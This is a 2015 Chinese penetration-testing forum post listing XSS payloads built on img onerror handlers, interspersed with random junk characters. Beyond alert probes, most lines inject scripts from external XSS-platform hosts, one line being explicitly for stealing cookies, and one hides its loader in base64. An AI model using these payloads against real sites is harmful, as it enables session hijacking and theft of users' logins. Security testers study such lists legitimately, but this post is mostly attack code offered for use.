中国网络渗透测试联盟
标题:
img标签的常用几种测试手段
[打印本页]
作者:
admin
时间:
2015-10-18 14:33
标题:
img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
2 X) l9 g7 M) q( O D* l
<img src=# onerror=alert(123)>
% c& w* b# l- E& o; R! r6 R
<img src=# onerror=alert(document.cookie)>
' l- l" B) k1 `/ O" s) L
下面是利用平台钓cookie的
) y4 R2 E9 Y K* C
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
% B s# Q+ d3 d" P- m$ ^9 N" i7 \
( `2 N; n: O- ?6 c- w9 C; R
) T' e6 k$ O6 D# g( I
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
3 W. ]" s3 T9 a, ^& F
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
q( s2 b5 C f- W* C/ {
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
" T/ m1 E& P; G
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
9 O) n! r6 H) X( j0 F q
<img src="#">
3 H1 X9 o- m, s+ B( {
<img src="#">
% x% W& f; Z9 C& n; T) b
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
" f1 T2 |, F0 L0 c; `5 a+ {7 \
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- w$ p) m4 e5 X. g$ {; }
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
2 U \9 c- x$ J
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
' j. q. z% \; m7 V' D
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
" A7 P2 ^- z1 E
<img src=x width="0" height="0"></img>
0 Z4 b. s$ \4 d2 N6 M
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
/ K, e8 U5 }" Y* U* _8 J x& r4 A
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
% n' n) K* L4 `0 j2 s6 n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2